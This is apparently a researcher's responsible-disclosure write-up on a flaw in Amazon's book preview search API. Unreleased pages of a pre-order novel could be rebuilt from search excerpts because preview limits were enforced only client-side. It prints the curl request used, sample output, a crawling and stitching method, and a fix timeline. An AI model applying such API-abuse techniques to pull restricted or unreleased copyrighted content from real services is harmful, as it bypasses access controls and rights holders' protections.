Article Image
read

Discovery

As a fan of everything Blizzard and World of Warcraft in particularity, I always try to be up to date with all the lore and content that Blizzard produces both in-game and external media such as books or movies. With the Battle for Azeroth expansion pack released earlier this year, Blizzard has also prepared a Before the Storm novel to introduce the fans to the story behind the events that were about to happen later in the game.

While the game was supposed to release on 15th of August, the book was made available two months earlier on 12th of June with a small preview being published through Amazon (and other partners) few weeks before that.

As the most devoted of the fans read and analyzed every page that was available in the preview, I've started searching for specific information regarding specific character using the built-in search functionality in the preview reader interface. Too my surprise I've noticed that some of the results were unavailable to be previewed (due to being located in the yet unreleased pages of the book) but the search engine still provided a small excerpt around the searched phrase.

Notice the yellow warning mentioning that pages 68-80 are not available for preview while the search result from the page 71 with a small excerpt is visible in the left sidebar.

Since this meant that the data is out there, just marked unavailable I decided to reverse-engineer the API calls the preview interface was making to the back-end service and found the culprit:

curl 'https://www.amazon.com/gp/search-inside/service-data' \
-XPOST \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'Accept-Encoding: text' \
--data 'method=getSearchResults&asin=0399594094&buyingAsin=0399594094&query=sylvanas&pageSize=20&pageNumber=1'

This call returned a list of results within the book (including unreleased pages) as such:

{

    "totalResults": 101,
    "results": [
        [
            "21",
            "much by betrayal from a supposed ally, <b>Sylvanas</b> Windrunner, as by the monstrous, fel-fueled",
        ],
        [
            "28",
            "to fall into the wrong hands. \nInto <b>Sylvanas&#39;s</b> hands \nSo much power \n\tHe closed his",
        ],
        [
            "30",
            "one reason he was the best bodyguard <b>Sylvanas</b> could possibly have. There were other",
        ],
        [
            "31",
            "hazy. \nBut not all of it. \n\tAlthough <b>Sylvanas</b> had left behind most warmer emotions",
        ],
        [
            "32",
            "stone floor outside the small room. <b>Sylvanas</b> closed her eyes, trying to gather patience",
        ]
    ]
}
Output simplified for readability.

Exploit

With the above in mind, I have built a simple ruby script to crawl the book starting with few generic keywords that I knew will be present in the book in several places and then continue in a divide-and-conquer fashion based on the results from the search API. One hour or so later, I had a json file with a list of search results associated with a page it was found on.

[
    "commanded that she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had",
    "that she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been",
    "she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been someone",
    "do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been someone she respected"
]

I spent some time trying to figure out the best way to stitch the lines together and in the end decided to use a crude longest common sequence algorithm that would compare two fragments from same page and if there was a long enough common substring it would combine them together. Rinse and repeat unless you have just one fragment per page and voilà.

But with quite literally his dying breath, Vollin, the Horde's leader, had commanded that she do the opposite. He had claimed he had been granted a vision by the loa he honored. You must step out of da shadows and lead. You must be warchief Vol'jin had been someone she respected, although they had clashed on occasion.

Obviously, since this is based on an OCRed text and an not-so-ideal method of stitching and dumping the resulting text while readable still contains several "typos" and few missing sections. I'm confident that with improved tools and proper manual review a 99% (not including images) extraction is possible. After the release of the book I have compared the content of my "leaked" copy and the final release and the accuracy was around 90%.

Scope

This vulnerability affected a quite narrow subset of content available through Amazon Book Store and only applies to publishers who have joined Amazon's Search Inside program. Through this program, Amazon scans printed books and runs an OCR algorithm on the resulting images to build a database of searchable fragments within the book. This "feature" allows Amazon to provide their users with search results based not only on the title and small excerpt from the book but also on the whole content of the book.

This program is usually coupled with another product Amazon offers to the publishers - Look Inside. Whereas Search Inside only provides better search results, Look Inside allows users to actually preview the previously mentioned scanned pages before purchasing the product. When both features have been enabled for a given book, the users are also able to search the book for any phrase from within the preview interface.

Both of these programs do apply for Books available through a pre-order and many publishers use those previews as one of the stages of the marketing campaign before the book's release. According to Amazon documentation there are several limitations implemented and the publishers have some level of control on which pages are available to preview (ie. to prevent spoilers). Unfortunately, as we have seen, some of the limitations have been implemented in the client-side code which is against the standard security practice.

Timeline

17th May 2018 12:02 GMT+02 - Initial Report
17th May 2018 14:22 GMT+02 - Request for more information
18th May 2018 23:08 GMT+02 - Issue confirmed and triaged
22th May 2018 17:41 GMT+02 - Public API disabled
23th May 2018 23:26 GMT+02 - Hotfix deployed
31st May 2018 20:17 GMT+02 - Final fix deployed

Disclaimer: Amazon doesn't have a bug bounty program and didn't offer anything other than thanks and gratefulness for bringing the vulnerability to their attention. Blizzard Entertainment (as the copyright holder for the book I was testing with) has also been notified of this vulnerability and has offered a small gift.